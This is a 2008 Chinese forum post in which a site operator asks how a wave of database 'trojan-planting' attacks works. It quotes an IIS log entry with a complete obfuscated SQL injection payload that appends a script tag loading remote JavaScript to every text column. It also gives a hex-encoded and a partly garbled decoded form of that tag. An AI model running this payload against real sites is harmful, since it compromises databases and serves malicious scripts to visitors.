- 帖子
- 251
- 积分
- 667
- 威望
- 1075
- 金钱
- 829
- 在线时间
- 2 小时
|
[讨论]最近流行的数据库挂马方式讨论?
很多站被黑.挂了
0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D
这么一句,大家可以google上下,
还原</title>"><scrip</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
我抓的IIS的日志
---------- EX080518.LOG
2008-05-18 00:02:13 W3SVC337328992 125.76.230.26 GET /co/mb/pdview.asp pdid=59294;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 211.99.31.176 Mozilla/4.0 200 0 1236
很奇怪,为什么加了防注脚本,对这些危险的字符都过滤了,而且自己也测试了无法成功, 这个是怎么插入的,? |
|